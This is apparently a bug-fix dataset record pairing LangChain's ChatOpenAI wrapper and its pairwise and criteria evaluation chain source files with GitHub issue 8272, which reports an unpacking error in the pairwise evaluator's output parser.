"""OpenAI chat wrapper.""" from __future__ import annotations import logging import sys from typing import ( TYPE_CHECKING, Any, Callable, Dict, List, Mapping, Optional, Tuple, Union, ) from pydantic import Field, root_validator from tenacity import ( before_sleep_log, retry, retry_if_exception_type, stop_after_attempt, wait_exponential, ) from langchain.callbacks.manager import ( AsyncCallbackManagerForLLMRun, CallbackManagerForLLMRun, ) from langchain.chat_models.base import BaseChatModel from langchain.schema import ( ChatGeneration, ChatResult, ) from langchain.schema.messages import ( AIMessage, BaseMessage, ChatMessage, FunctionMessage, HumanMessage, SystemMessage, ) from langchain.utils import get_from_dict_or_env, get_pydantic_field_names if TYPE_CHECKING: import tiktoken logger = logging.getLogger(__name__) def _import_tiktoken() -> Any: try: import tiktoken except ImportError: raise ValueError( "Could not import tiktoken python package. " "This is needed in order to calculate get_token_ids. " "Please install it with `pip install tiktoken`." ) return tiktoken def _create_retry_decorator(llm: ChatOpenAI) -> Callable[[Any], Any]: import openai min_seconds = 1 max_seconds = 60 # Wait 2^x * 1 second between each retry starting with # 4 seconds, then up to 10 seconds, then 10 seconds afterwards return retry( reraise=True, stop=stop_after_attempt(llm.max_retries), wait=wait_exponential(multiplier=1, min=min_seconds, max=max_seconds), retry=( retry_if_exception_type(openai.error.Timeout) | retry_if_exception_type(openai.error.APIError) | retry_if_exception_type(openai.error.APIConnectionError) | retry_if_exception_type(openai.error.RateLimitError) | retry_if_exception_type(openai.error.ServiceUnavailableError) ), before_sleep=before_sleep_log(logger, logging.WARNING), ) async def acompletion_with_retry(llm: ChatOpenAI, **kwargs: Any) -> Any: """Use tenacity to retry the async completion call.""" retry_decorator = _create_retry_decorator(llm) @retry_decorator async def _completion_with_retry(**kwargs: Any) -> Any: # Use OpenAI's async api https://github.com/openai/openai-python#async-api return await llm.client.acreate(**kwargs) return await _completion_with_retry(**kwargs) def _convert_dict_to_message(_dict: Mapping[str, Any]) -> BaseMessage: role = _dict["role"] if role == "user": return HumanMessage(content=_dict["content"]) elif role == "assistant": # Fix for azure # Also OpenAI returns None for tool invocations content = _dict.get("content", "") or "" if _dict.get("function_call"): additional_kwargs = {"function_call": dict(_dict["function_call"])} else: additional_kwargs = {} return AIMessage(content=content, additional_kwargs=additional_kwargs) elif role == "system": return SystemMessage(content=_dict["content"]) elif role == "function": return FunctionMessage(content=_dict["content"], name=_dict["name"]) else: return ChatMessage(content=_dict["content"], role=role) def _convert_message_to_dict(message: BaseMessage) -> dict: if isinstance(message, ChatMessage): message_dict = {"role": message.role, "content": message.content} elif isinstance(message, HumanMessage): message_dict = {"role": "user", "content": message.content} elif isinstance(message, AIMessage): message_dict = {"role": "assistant", "content": message.content} if "function_call" in message.additional_kwargs: message_dict["function_call"] = message.additional_kwargs["function_call"] elif isinstance(message, SystemMessage): message_dict = {"role": "system", "content": message.content} elif isinstance(message, FunctionMessage): message_dict = { "role": "function", "content": message.content, "name": message.name, } else: raise ValueError(f"Got unknown type {message}") if "name" in message.additional_kwargs: message_dict["name"] = message.additional_kwargs["name"] return message_dict class ChatOpenAI(BaseChatModel): """Wrapper around OpenAI Chat large language models. To use, you should have the ``openai`` python package installed, and the environment variable ``OPENAI_API_KEY`` set with your API key. Any parameters that are valid to be passed to the openai.create call can be passed in, even if not explicitly saved on this class. Example: .. code-block:: python from langchain.chat_models import ChatOpenAI openai = ChatOpenAI(model_name="gpt-3.5-turbo") """ @property def lc_secrets(self) -> Dict[str, str]: return {"openai_api_key": "OPENAI_API_KEY"} @property def lc_serializable(self) -> bool: return True client: Any #: :meta private: model_name: str = Field(default="gpt-3.5-turbo", alias="model") """Model name to use.""" temperature: float = 0.7 """What sampling temperature to use.""" model_kwargs: Dict[str, Any] = Field(default_factory=dict) """Holds any model parameters valid for `create` call not explicitly specified.""" openai_api_key: Optional[str] = None """Base URL path for API requests, leave blank if not using a proxy or service emulator.""" openai_api_base: Optional[str] = None openai_organization: Optional[str] = None # to support explicit proxy for OpenAI openai_proxy: Optional[str] = None request_timeout: Optional[Union[float, Tuple[float, float]]] = None """Timeout for requests to OpenAI completion API. Default is 600 seconds.""" max_retries: int = 6 """Maximum number of retries to make when generating.""" streaming: bool = False """Whether to stream the results or not.""" n: int = 1 """Number of chat completions to generate for each prompt.""" max_tokens: Optional[int] = None """Maximum number of tokens to generate.""" tiktoken_model_name: Optional[str] = None """The model name to pass to tiktoken when using this class. Tiktoken is used to count the number of tokens in documents to constrain them to be under a certain limit. By default, when set to None, this will be the same as the embedding model name. However, there are some cases where you may want to use this Embedding class with a model name not supported by tiktoken. This can include when using Azure embeddings or when using one of the many model providers that expose an OpenAI-like API but with different models. In those cases, in order to avoid erroring when tiktoken is called, you can specify a model name to use here.""" class Config: """Configuration for this pydantic object.""" allow_population_by_field_name = True @root_validator(pre=True) def build_extra(cls, values: Dict[str, Any]) -> Dict[str, Any]: """Build extra kwargs from additional params that were passed in.""" all_required_field_names = get_pydantic_field_names(cls) extra = values.get("model_kwargs", {}) for field_name in list(values): if field_name in extra: raise ValueError(f"Found {field_name} supplied twice.") if field_name not in all_required_field_names: logger.warning( f"""WARNING! {field_name} is not default parameter. {field_name} was transferred to model_kwargs. Please confirm that {field_name} is what you intended.""" ) extra[field_name] = values.pop(field_name) invalid_model_kwargs = all_required_field_names.intersection(extra.keys()) if invalid_model_kwargs: raise ValueError( f"Parameters {invalid_model_kwargs} should be specified explicitly. " f"Instead they were passed in as part of `model_kwargs` parameter." ) values["model_kwargs"] = extra return values @root_validator() def validate_environment(cls, values: Dict) -> Dict: """Validate that api key and python package exists in environment.""" values["openai_api_key"] = get_from_dict_or_env( values, "openai_api_key", "OPENAI_API_KEY" ) values["openai_organization"] = get_from_dict_or_env( values, "openai_organization", "OPENAI_ORGANIZATION", default="", ) values["openai_api_base"] = get_from_dict_or_env( values, "openai_api_base", "OPENAI_API_BASE", default="", ) values["openai_proxy"] = get_from_dict_or_env( values, "openai_proxy", "OPENAI_PROXY", default="", ) try: import openai except ImportError: raise ValueError( "Could not import openai python package. " "Please install it with `pip install openai`." ) try: values["client"] = openai.ChatCompletion except AttributeError: raise ValueError( "`openai` has no `ChatCompletion` attribute, this is likely " "due to an old version of the openai package. Try upgrading it " "with `pip install --upgrade openai`." ) if values["n"] < 1: raise ValueError("n must be at least 1.") if values["n"] > 1 and values["streaming"]: raise ValueError("n must be 1 when streaming.") return values @property def _default_params(self) -> Dict[str, Any]: """Get the default parameters for calling OpenAI API.""" return { "model": self.model_name, "request_timeout": self.request_timeout, "max_tokens": self.max_tokens, "stream": self.streaming, "n": self.n, "temperature": self.temperature, **self.model_kwargs, } def completion_with_retry(self, **kwargs: Any) -> Any: """Use tenacity to retry the completion call.""" retry_decorator = _create_retry_decorator(self) @retry_decorator def _completion_with_retry(**kwargs: Any) -> Any: return self.client.create(**kwargs) return _completion_with_retry(**kwargs) def _combine_llm_outputs(self, llm_outputs: List[Optional[dict]]) -> dict: overall_token_usage: dict = {} for output in llm_outputs: if output is None: # Happens in streaming continue token_usage = output["token_usage"] for k, v in token_usage.items(): if k in overall_token_usage: overall_token_usage[k] += v else: overall_token_usage[k] = v return {"token_usage": overall_token_usage, "model_name": self.model_name} def _generate( self, messages: List[BaseMessage], stop: Optional[List[str]] = None, run_manager: Optional[CallbackManagerForLLMRun] = None, **kwargs: Any, ) -> ChatResult: message_dicts, params = self._create_message_dicts(messages, stop) params = {**params, **kwargs} if self.streaming: inner_completion = "" role = "assistant" params["stream"] = True function_call: Optional[dict] = None for stream_resp in self.completion_with_retry( messages=message_dicts, **params ): role = stream_resp["choices"][0]["delta"].get("role", role) token = stream_resp["choices"][0]["delta"].get("content") or "" inner_completion += token _function_call = stream_resp["choices"][0]["delta"].get("function_call") if _function_call: if function_call is None: function_call = _function_call else: function_call["arguments"] += _function_call["arguments"] if run_manager: run_manager.on_llm_new_token(token) message = _convert_dict_to_message( { "content": inner_completion, "role": role, "function_call": function_call, } ) return ChatResult(generations=[ChatGeneration(message=message)]) response = self.completion_with_retry(messages=message_dicts, **params) return self._create_chat_result(response) def _create_message_dicts( self, messages: List[BaseMessage], stop: Optional[List[str]] ) -> Tuple[List[Dict[str, Any]], Dict[str, Any]]: params = self._client_params if stop is not None: if "stop" in params: raise ValueError("`stop` found in both the input and default params.") params["stop"] = stop message_dicts = [_convert_message_to_dict(m) for m in messages] return message_dicts, params def _create_chat_result(self, response: Mapping[str, Any]) -> ChatResult: generations = [] for res in response["choices"]: message = _convert_dict_to_message(res["message"]) gen = ChatGeneration( message=message, generation_info=dict(finish_reason=res.get("finish_reason")), ) generations.append(gen) token_usage = response.get("usage", {}) llm_output = {"token_usage": token_usage, "model_name": self.model_name} return ChatResult(generations=generations, llm_output=llm_output) async def _agenerate( self, messages: List[BaseMessage], stop: Optional[List[str]] = None, run_manager: Optional[AsyncCallbackManagerForLLMRun] = None, **kwargs: Any, ) -> ChatResult: message_dicts, params = self._create_message_dicts(messages, stop) params = {**params, **kwargs} if self.streaming: inner_completion = "" role = "assistant" params["stream"] = True function_call: Optional[dict] = None async for stream_resp in await acompletion_with_retry( self, messages=message_dicts, **params ): role = stream_resp["choices"][0]["delta"].get("role", role) token = stream_resp["choices"][0]["delta"].get("content", "") inner_completion += token or "" _function_call = stream_resp["choices"][0]["delta"].get("function_call") if _function_call: if function_call is None: function_call = _function_call else: function_call["arguments"] += _function_call["arguments"] if run_manager: await run_manager.on_llm_new_token(token) message = _convert_dict_to_message( { "content": inner_completion, "role": role, "function_call": function_call, } ) return ChatResult(generations=[ChatGeneration(message=message)]) else: response = await acompletion_with_retry( self, messages=message_dicts, **params ) return self._create_chat_result(response) @property def _identifying_params(self) -> Dict[str, Any]: """Get the identifying parameters.""" return {**{"model_name": self.model_name}, **self._default_params} @property def _client_params(self) -> Dict[str, Any]: """Get the parameters used for the openai client.""" openai_creds: Dict[str, Any] = { "api_key": self.openai_api_key, "api_base": self.openai_api_base, "organization": self.openai_organization, "model": self.model_name, } if self.openai_proxy: import openai openai.proxy = {"http": self.openai_proxy, "https": self.openai_proxy} # type: ignore[assignment] # noqa: E501 return {**self._default_params, **openai_creds} def _get_invocation_params( self, stop: Optional[List[str]] = None, **kwargs: Any ) -> Dict[str, Any]: """Get the parameters used to invoke the model.""" return { "model": self.model_name, **super()._get_invocation_params(stop=stop), **self._default_params, **kwargs, } @property def _llm_type(self) -> str: """Return type of chat model.""" return "openai-chat" def _get_encoding_model(self) -> Tuple[str, tiktoken.Encoding]: tiktoken_ = _import_tiktoken() if self.tiktoken_model_name is not None: model = self.tiktoken_model_name else: model = self.model_name if model == "gpt-3.5-turbo": # gpt-3.5-turbo may change over time. # Returning num tokens assuming gpt-3.5-turbo-0301. model = "gpt-3.5-turbo-0301" elif model == "gpt-4": # gpt-4 may change over time. # Returning num tokens assuming gpt-4-0314. model = "gpt-4-0314" # Returns the number of tokens used by a list of messages. try: encoding = tiktoken_.encoding_for_model(model) except KeyError: logger.warning("Warning: model not found. Using cl100k_base encoding.") model = "cl100k_base" encoding = tiktoken_.get_encoding(model) return model, encoding def get_token_ids(self, text: str) -> List[int]: """Get the tokens present in the text with tiktoken package.""" # tiktoken NOT supported for Python 3.7 or below if sys.version_info[1] <= 7: return super().get_token_ids(text) _, encoding_model = self._get_encoding_model() return encoding_model.encode(text) def get_num_tokens_from_messages(self, messages: List[BaseMessage]) -> int: """Calculate num tokens for gpt-3.5-turbo and gpt-4 with tiktoken package. Official documentation: https://github.com/openai/openai-cookbook/blob/ main/examples/How_to_format_inputs_to_ChatGPT_models.ipynb""" if sys.version_info[1] <= 7: return super().get_num_tokens_from_messages(messages) model, encoding = self._get_encoding_model() if model.startswith("gpt-3.5-turbo"): # every message follows <im_start>{role/name}\n{content}<im_end>\n tokens_per_message = 4 # if there's a name, the role is omitted tokens_per_name = -1 elif model.startswith("gpt-4"): tokens_per_message = 3 tokens_per_name = 1 else: raise NotImplementedError( f"get_num_tokens_from_messages() is not presently implemented " f"for model {model}." "See https://github.com/openai/openai-python/blob/main/chatml.md for " "information on how messages are converted to tokens." ) num_tokens = 0 messages_dict = [_convert_message_to_dict(m) for m in messages] for message in messages_dict: num_tokens += tokens_per_message for key, value in message.items(): num_tokens += len(encoding.encode(value)) if key == "name": num_tokens += tokens_per_name # every reply is primed with <im_start>assistant num_tokens += 3 return num_tokens
closed
langchain-ai/langchain
https://github.com/langchain-ai/langchain
8,272
not enough values to unpack (expected 2, got 1) while LabeledPairwiseStringEvalChain with evaluate_string_pairs
### System Info platform = mac m2 python = 3.11 ### Who can help? @hwchase17 ### Information - [X] The official example notebooks/scripts - [ ] My own modified scripts ### Related Components - [ ] LLMs/Chat Models - [ ] Embedding Models - [ ] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [ ] Document Loaders - [ ] Vector Stores / Retrievers - [ ] Memory - [ ] Agents / Agent Executors - [ ] Tools / Toolkits - [ ] Chains - [ ] Callbacks/Tracing - [ ] Async ### Reproduction ``` prompt_template = PromptTemplate.from_template( """Given the input context and the reference, analyze and determine which prediction, A or B, aligns most closely with the reference label. Consider the following factors while analyzing: - Relevance to the input context - Semantic similarity with the reference label - Consistency with any specifics mentioned in the input The DATA for this decision are as follows: Input Context: {input} Reference Label: {reference} Option A: {prediction} Option B: {prediction_b} After analyzing, provide the reasoning for your selection, and finally, respond with either [[A]] or [[B]] on its own line. In the case that both options are equally similar, default to option [[A]]. --- Reasoning: """ ) evalutionChain = LabeledPairwiseStringEvalChain.from_llm( llm=llm, prompt=prompt_template ) result = evalutionChain.evaluate_string_pairs( input=self.currentQuery, prediction=response1, prediction_b=response2, reference=self.formatSourcesStructure(sourcedocs), ) ``` sometime it gives error like ``` not enough values to unpack (expected 2, got 1) ``` it like every 3-4 request, 1 request failing with this request, and when request failed, on next request it gives the response ### Expected behavior There will be no error, and should return valid response
https://github.com/langchain-ai/langchain/issues/8272
https://github.com/langchain-ai/langchain/pull/8278
9cbefcc56cbce50e1f6d9392c17e15415d55b7ba
adf019724f095b1835040f4dd8c1ff0026cbc729
"2023-07-26T07:20:57Z"
python
"2023-07-26T08:53:22Z"
libs/langchain/langchain/evaluation/comparison/eval_chain.py
"""Base classes for comparing the output of two models.""" from __future__ import annotations from typing import Any, Dict, List, Optional from pydantic import Extra, Field from langchain.callbacks.manager import Callbacks from langchain.chains.llm import LLMChain from langchain.evaluation.comparison.prompt import PROMPT, PROMPT_WITH_REFERENCE from langchain.evaluation.schema import LLMEvalChain, PairwiseStringEvaluator from langchain.prompts.prompt import PromptTemplate from langchain.schema import RUN_KEY, BaseOutputParser from langchain.schema.language_model import BaseLanguageModel class PairwiseStringResultOutputParser(BaseOutputParser[dict]): """A parser for the output of the PairwiseStringEvalChain. Attributes: _type (str): The type of the output parser. """ @property def _type(self) -> str: """Return the type of the output parser. Returns: str: The type of the output parser. """ return "pairwise_string_result" def parse(self, text: str) -> Any: """Parse the output text. Args: text (str): The output text to parse. Returns: Any: The parsed output. Raises: ValueError: If the verdict is invalid. """ reasoning, verdict = text.strip().rsplit("\n", maxsplit=1) verdict = verdict.strip("[").strip("]") if verdict not in {"A", "B", "C"}: raise ValueError( f"Invalid verdict: {verdict}. " "Verdict must be one of 'A', 'B', or 'C'." ) # C means the models are tied. Return 'None' meaning no preference verdict_ = None if verdict == "C" else verdict score = { "A": 1, "B": 0, None: 0.5, }.get(verdict_) return { "reasoning": reasoning, "value": verdict_, "score": score, } class PairwiseStringEvalChain(PairwiseStringEvaluator, LLMEvalChain, LLMChain): """A chain for comparing two outputs, such as the outputs of two models, prompts, or outputs of a single model on similar inputs. Attributes: output_parser (BaseOutputParser): The output parser for the chain. Example: >>> from langchain.chat_models import ChatOpenAI >>> from langchain.evaluation.comparison import PairwiseStringEvalChain >>> llm = ChatOpenAI(temperature=0) >>> chain = PairwiseStringEvalChain.from_llm(llm=llm) >>> result = chain.evaluate_string_pairs( ... input = "What is the chemical formula for water?", ... prediction = "H2O", ... prediction_b = ( ... "The chemical formula for water is H2O, which means" ... " there are two hydrogen atoms and one oxygen atom." ... reference = "The chemical formula for water is H2O.", ... ) >>> print(result["text"]) # { # "value": "B", # "comment": "Both responses accurately state" # " that the chemical formula for water is H2O." # " However, Response B provides additional information" # . " by explaining what the formula means.\\n[[B]]" # } """ output_key: str = "results" #: :meta private: output_parser: BaseOutputParser = Field( default_factory=PairwiseStringResultOutputParser ) class Config: """Configuration for the PairwiseStringEvalChain.""" extra = Extra.ignore @property def requires_reference(self) -> bool: """Return whether the chain requires a reference. Returns: bool: True if the chain requires a reference, False otherwise. """ return False @property def requires_input(self) -> bool: """Return whether the chain requires an input. Returns: bool: True if the chain requires an input, False otherwise. """ return True @property def _skip_reference_warning(self) -> str: """Return the warning to show when reference is ignored. Returns: str: The warning to show when reference is ignored. """ return ( f"Ignoring reference in {self.__class__.__name__}, as it is not expected." "\nTo use a reference, use the LabeledPairwiseStringEvalChain" " (EvaluatorType.LABELED_PAIRWISE_STRING) instead." ) @classmethod def from_llm( cls, llm: BaseLanguageModel, *, prompt: Optional[PromptTemplate] = None, **kwargs: Any, ) -> PairwiseStringEvalChain: """Initialize the PairwiseStringEvalChain from an LLM. Args: llm (BaseLanguageModel): The LLM to use. prompt (PromptTemplate, optional): The prompt to use. **kwargs (Any): Additional keyword arguments. Returns: PairwiseStringEvalChain: The initialized PairwiseStringEvalChain. Raises: ValueError: If the input variables are not as expected. """ expected_input_vars = {"prediction", "prediction_b", "input"} prompt_ = prompt or PROMPT if expected_input_vars != set(prompt_.input_variables): raise ValueError( f"Input variables should be {expected_input_vars}, " f"but got {prompt_.input_variables}" ) return cls(llm=llm, prompt=prompt_, **kwargs) def _prepare_input( self, prediction: str, prediction_b: str, input: Optional[str], reference: Optional[str], ) -> dict: """Prepare the input for the chain. Args: prediction (str): The output string from the first model. prediction_b (str): The output string from the second model. input (str, optional): The input or task string. reference (str, optional): The reference string, if any. Returns: dict: The prepared input for the chain. """ input_ = { "prediction": prediction, "prediction_b": prediction_b, "input": input, } if self.requires_reference: input_["reference"] = reference return input_ def _prepare_output(self, result: dict) -> dict: """Prepare the output.""" parsed = result[self.output_key] if RUN_KEY in result: parsed[RUN_KEY] = result[RUN_KEY] return parsed def _evaluate_string_pairs( self, *, prediction: str, prediction_b: str, input: Optional[str] = None, reference: Optional[str] = None, callbacks: Callbacks = None, tags: Optional[List[str]] = None, metadata: Optional[Dict[str, Any]] = None, include_run_info: bool = False, **kwargs: Any, ) -> dict: """Evaluate whether output A is preferred to output B. Args: prediction (str): The output string from the first model. prediction_b (str): The output string from the second model. input (str, optional): The input or task string. callbacks (Callbacks, optional): The callbacks to use. reference (str, optional): The reference string, if any. **kwargs (Any): Additional keyword arguments. Returns: dict: A dictionary containing: - reasoning: The reasoning for the preference. - value: The preference value, which is either 'A', 'B', or None for no preference. - score: The preference score, which is 1 for 'A', 0 for 'B', and 0.5 for None. """ input_ = self._prepare_input(prediction, prediction_b, input, reference) result = self( inputs=input_, callbacks=callbacks, tags=tags, metadata=metadata, include_run_info=include_run_info, ) return self._prepare_output(result) async def _aevaluate_string_pairs( self, *, prediction: str, prediction_b: str, reference: Optional[str] = None, input: Optional[str] = None, callbacks: Callbacks = None, tags: Optional[List[str]] = None, metadata: Optional[Dict[str, Any]] = None, include_run_info: bool = False, **kwargs: Any, ) -> dict: """Asynchronously evaluate whether output A is preferred to output B. Args: prediction (str): The output string from the first model. prediction_b (str): The output string from the second model. input (str, optional): The input or task string. callbacks (Callbacks, optional): The callbacks to use. reference (str, optional): The reference string, if any. **kwargs (Any): Additional keyword arguments. Returns: dict: A dictionary containing: - reasoning: The reasoning for the preference. - value: The preference value, which is either 'A', 'B', or None for no preference. - score: The preference score, which is 1 for 'A', 0 for 'B', and 0.5 for None. """ input_ = self._prepare_input(prediction, prediction_b, input, reference) result = await self.acall( inputs=input_, callbacks=callbacks, tags=tags, metadata=metadata, include_run_info=include_run_info, ) return self._prepare_output(result) class LabeledPairwiseStringEvalChain(PairwiseStringEvalChain): """A chain for comparing two outputs, such as the outputs of two models, prompts, or outputs of a single model on similar inputs, with labeled preferences. Attributes: output_parser (BaseOutputParser): The output parser for the chain. """ @property def requires_reference(self) -> bool: """Return whether the chain requires a reference. Returns: bool: True if the chain requires a reference, False otherwise. """ return True @classmethod def from_llm( cls, llm: BaseLanguageModel, *, prompt: Optional[PromptTemplate] = None, **kwargs: Any, ) -> PairwiseStringEvalChain: """Initialize the LabeledPairwiseStringEvalChain from an LLM. Args: llm (BaseLanguageModel): The LLM to use. prompt (PromptTemplate, optional): The prompt to use. **kwargs (Any): Additional keyword arguments. Returns: LabeledPairwiseStringEvalChain: The initialized LabeledPairwiseStringEvalChain. Raises: ValueError: If the input variables are not as expected. """ # noqa: E501 expected_input_vars = {"prediction", "prediction_b", "input", "reference"} prompt_ = prompt or PROMPT_WITH_REFERENCE if expected_input_vars != set(prompt_.input_variables): raise ValueError( f"Input variables should be {expected_input_vars}, " f"but got {prompt_.input_variables}" ) return cls(llm=llm, prompt=prompt_, **kwargs)
closed
langchain-ai/langchain
https://github.com/langchain-ai/langchain
8,272
not enough values to unpack (expected 2, got 1) while LabeledPairwiseStringEvalChain with evaluate_string_pairs
### System Info platform = mac m2 python = 3.11 ### Who can help? @hwchase17 ### Information - [X] The official example notebooks/scripts - [ ] My own modified scripts ### Related Components - [ ] LLMs/Chat Models - [ ] Embedding Models - [ ] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [ ] Document Loaders - [ ] Vector Stores / Retrievers - [ ] Memory - [ ] Agents / Agent Executors - [ ] Tools / Toolkits - [ ] Chains - [ ] Callbacks/Tracing - [ ] Async ### Reproduction ``` prompt_template = PromptTemplate.from_template( """Given the input context and the reference, analyze and determine which prediction, A or B, aligns most closely with the reference label. Consider the following factors while analyzing: - Relevance to the input context - Semantic similarity with the reference label - Consistency with any specifics mentioned in the input The DATA for this decision are as follows: Input Context: {input} Reference Label: {reference} Option A: {prediction} Option B: {prediction_b} After analyzing, provide the reasoning for your selection, and finally, respond with either [[A]] or [[B]] on its own line. In the case that both options are equally similar, default to option [[A]]. --- Reasoning: """ ) evalutionChain = LabeledPairwiseStringEvalChain.from_llm( llm=llm, prompt=prompt_template ) result = evalutionChain.evaluate_string_pairs( input=self.currentQuery, prediction=response1, prediction_b=response2, reference=self.formatSourcesStructure(sourcedocs), ) ``` sometime it gives error like ``` not enough values to unpack (expected 2, got 1) ``` it like every 3-4 request, 1 request failing with this request, and when request failed, on next request it gives the response ### Expected behavior There will be no error, and should return valid response
https://github.com/langchain-ai/langchain/issues/8272
https://github.com/langchain-ai/langchain/pull/8278
9cbefcc56cbce50e1f6d9392c17e15415d55b7ba
adf019724f095b1835040f4dd8c1ff0026cbc729
"2023-07-26T07:20:57Z"
python
"2023-07-26T08:53:22Z"
libs/langchain/langchain/evaluation/criteria/eval_chain.py
from __future__ import annotations from enum import Enum from typing import Any, Dict, List, Mapping, Optional, Union from pydantic import Extra, Field from langchain.callbacks.manager import Callbacks from langchain.chains.constitutional_ai.models import ConstitutionalPrinciple from langchain.chains.llm import LLMChain from langchain.evaluation.criteria.prompt import PROMPT, PROMPT_WITH_REFERENCES from langchain.evaluation.schema import LLMEvalChain, StringEvaluator from langchain.schema import RUN_KEY, BaseOutputParser, BasePromptTemplate from langchain.schema.language_model import BaseLanguageModel class Criteria(str, Enum): """A Criteria to evaluate.""" CONCISENESS = "conciseness" RELEVANCE = "relevance" CORRECTNESS = "correctness" COHERENCE = "coherence" HARMFULNESS = "harmfulness" MALICIOUSNESS = "maliciousness" HELPFULNESS = "helpfulness" CONTROVERSIALITY = "controversiality" MISOGYNY = "misogyny" CRIMINALITY = "criminality" INSENSITIVITY = "insensitivity" _SUPPORTED_CRITERIA = { Criteria.CONCISENESS: "Is the submission concise and to the point?", Criteria.RELEVANCE: "Is the submission referring to a real quote from the text?", Criteria.CORRECTNESS: "Is the submission correct, accurate, and factual?", Criteria.COHERENCE: "Is the submission coherent, well-structured, and organized?", Criteria.HARMFULNESS: "Is the submission harmful, offensive, or inappropriate?" " If so, response Y. If not, respond N.", Criteria.MALICIOUSNESS: "Is the submission malicious in any way?" " If so, response Y. If not, respond N.", Criteria.HELPFULNESS: "Is the submission helpful, insightful, and appropriate?" " If so, response Y. If not, respond N.", Criteria.CONTROVERSIALITY: "Is the submission controversial or debatable?" " If so, response Y. If not, respond N.", Criteria.MISOGYNY: "Is the submission misogynistic? If so, response Y." " If not, respond N.", Criteria.CRIMINALITY: "Is the submission criminal in any way?" " If so, response Y. If not, respond N.", Criteria.INSENSITIVITY: "Is the submission insensitive to any group of people?" " If so, response Y. If not, respond N.", } class CriteriaResultOutputParser(BaseOutputParser[dict]): """A parser for the output of the CriteriaEvalChain.""" @property def _type(self) -> str: return "criteria_result" def parse(self, text: str) -> Any: """Parse the output text. Args: text (str): The output text to parse. Returns: Any: The parsed output. """ reasoning, verdict = text.strip().rsplit("\n", maxsplit=1) score = 1 if verdict.upper() == "Y" else (0 if verdict.upper() == "N" else None) return { "reasoning": reasoning.strip(), "value": verdict, "score": score, } CRITERIA_TYPE = Union[ Mapping[str, str], Criteria, ConstitutionalPrinciple, ] class CriteriaEvalChain(StringEvaluator, LLMEvalChain, LLMChain): """LLM Chain for evaluating runs against criteria. Parameters ---------- llm : BaseLanguageModel The language model to use for evaluation. criteria : Union[Mapping[str, str]] The criteriaor rubric to evaluate the runs against. It can be a mapping of criterion name to its sdescription, or a single criterion name. prompt : Optional[BasePromptTemplate], default=None The prompt template to use for generating prompts. If not provided, a default prompt template will be used based on the value of `requires_reference`. requires_reference : bool, default=False Whether the evaluation requires a reference text. If `True`, the `PROMPT_WITH_REFERENCES` template will be used, which includes the reference labels in the prompt. Otherwise, the `PROMPT` template will be used, which is a reference-free prompt. **kwargs : Any Additional keyword arguments to pass to the `LLMChain` constructor. Returns ------- CriteriaEvalChain An instance of the `CriteriaEvalChain` class. Examples -------- >>> from langchain.chat_models import ChatAnthropic >>> from langchain.evaluation.criteria import CriteriaEvalChain >>> llm = ChatAnthropic(temperature=0) >>> criteria = {"my-custom-criterion": "Is the submission the most amazing ever?"} >>> evaluator = CriteriaEvalChain.from_llm(llm=llm, criteria=criteria) >>> evaluator.evaluate_strings(prediction="Imagine an ice cream flavor for the color aquamarine", input="Tell me an idea") { 'reasoning': 'Here is my step-by-step reasoning for the given criteria:\\n\\nThe criterion is: "Is the submission the most amazing ever?" This is a subjective criterion and open to interpretation. The submission suggests an aquamarine-colored ice cream flavor which is creative but may or may not be considered the most amazing idea ever conceived. There are many possible amazing ideas and this one ice cream flavor suggestion may or may not rise to that level for every person. \\n\\nN', 'value': 'N', 'score': 0, } >>> from langchain.chat_models import ChatOpenAI >>> from langchain.evaluation.criteria import LabeledCriteriaEvalChain >>> llm = ChatOpenAI(model="gpt-4", temperature=0) >>> criteria = "correctness" >>> evaluator = LabeledCriteriaEvalChain.from_llm( ... llm=llm, ... criteria=criteria, ... ) >>> evaluator.evaluate_strings( ... prediction="The answer is 4", ... input="How many apples are there?", ... reference="There are 3 apples", ... ) { 'score': 0, 'reasoning': 'The criterion for this task is the correctness of the submission. The submission states that there are 4 apples, but the reference indicates that there are actually 3 apples. Therefore, the submission is not correct, accurate, or factual according to the given criterion.\\n\\nN', 'value': 'N', } """ # noqa: E501 output_parser: BaseOutputParser = Field(default_factory=CriteriaResultOutputParser) """The parser to use to map the output to a structured result.""" criterion_name: str """The name of the criterion being evaluated.""" output_key: str = "results" #: :meta private: class Config: """Configuration for the QAEvalChain.""" extra = Extra.ignore @property def requires_reference(self) -> bool: """Whether the evaluation requires a reference text.""" return False @property def requires_input(self) -> bool: return True @property def evaluation_name(self) -> str: """Get the name of the evaluation. Returns ------- str The name of the evaluation. """ return self.criterion_name @property def _skip_reference_warning(self) -> str: """Warning to show when reference is ignored.""" return ( f"Ignoring reference in {self.__class__.__name__}, as it is not expected." "\nTo use references, use the labeled_criteria instead." ) @classmethod def resolve_criteria( cls, criteria: Optional[Union[CRITERIA_TYPE, str]], ) -> Dict[str, str]: """Resolve the criteria to evaluate. Parameters ---------- criteria : CRITERIA_TYPE The criteria to evaluate the runs against. It can be: - a mapping of a criterion name to its description - a single criterion name present in one of the default criteria - a single `ConstitutionalPrinciple` instance Returns ------- Dict[str, str] A dictionary mapping criterion names to descriptions. Examples -------- >>> criterion = "relevance" >>> CriteriaEvalChain.resolve_criteria(criteria) {'relevance': 'Is the submission referring to a real quote from the text?'} """ # noqa: E501 if criteria is None: return { "helpfulness": _SUPPORTED_CRITERIA[Criteria.HELPFULNESS], } if isinstance(criteria, Criteria): criteria_ = {criteria.value: _SUPPORTED_CRITERIA[criteria]} elif isinstance(criteria, str): criteria_ = {criteria: _SUPPORTED_CRITERIA[Criteria(criteria)]} elif isinstance(criteria, ConstitutionalPrinciple): criteria_ = {criteria.name: criteria.critique_request} else: if not criteria: raise ValueError( "Criteria cannot be empty. " "Please provide a criterion name or a mapping of the criterion name" " to its description." ) criteria_ = dict(criteria) return criteria_ @classmethod def _resolve_prompt( cls, prompt: Optional[BasePromptTemplate] = None ) -> BasePromptTemplate: expected_input_vars = {"input", "output", "criteria"} prompt_ = prompt or PROMPT if expected_input_vars != set(prompt_.input_variables): raise ValueError( f"Input variables should be {expected_input_vars}, " f"but got {prompt_.input_variables}" ) return prompt_ @classmethod def from_llm( cls, llm: BaseLanguageModel, criteria: Optional[CRITERIA_TYPE] = None, *, prompt: Optional[BasePromptTemplate] = None, **kwargs: Any, ) -> CriteriaEvalChain: """Create a `CriteriaEvalChain` instance from an llm and criteria. Parameters ---------- llm : BaseLanguageModel The language model to use for evaluation. criteria : CRITERIA_TYPE - default=None for "helpfulness" The criteria to evaluate the runs against. It can be: - a mapping of a criterion 